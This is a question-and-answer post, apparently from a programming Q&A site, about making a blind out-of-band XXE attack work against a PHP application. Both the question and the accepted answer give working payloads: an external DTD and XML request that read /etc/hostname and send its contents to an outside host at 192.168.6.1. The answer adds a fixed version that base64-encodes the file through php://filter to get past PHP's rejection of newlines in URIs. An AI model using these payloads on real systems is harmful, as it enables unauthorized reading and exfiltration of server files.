# PHP Blind XXE Exploitation: Invalid URI in Entity

Tags: php, xxe

When attempting to exploit blind XXE as explained in [this article](https://blog.zsec.uk/out-of-band-xxe-2/), I got an error in my apache logs:

`PHP Warning:  DOMDocument::loadXML(): Invalid URI: http://192.168.6.1/82a3ccab632c in Entity`

The DTD file:

```
<!ENTITY % payload SYSTEM "file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
```

The request:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE load SYSTEM "http://192.168.6.1/xxe.dtd">
<root><email>asd</email><password>asd</password></root>
```

Why can't I send the `/etc/hostname`?

Answer (score 2, accepted):

I found out the issue is that `/etc/hostname` has a newline at the end. Apparently, while Java applications have no problem with this (as shown in the article), PHP does not accept newlines in URIs.

I confirmed this by creating a file which doesn't contain a newline. I was able to send it successfully.

In fact, you can use the `php://` protocol to convert the file's contents to base64 and get around the restriction. Here is the updated payload:

```
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hostname">
<!ENTITY % remote
"<!ENTITY &#37; send SYSTEM 'http://192.168.6.1/%payload;'>">
%remote;
%send;
```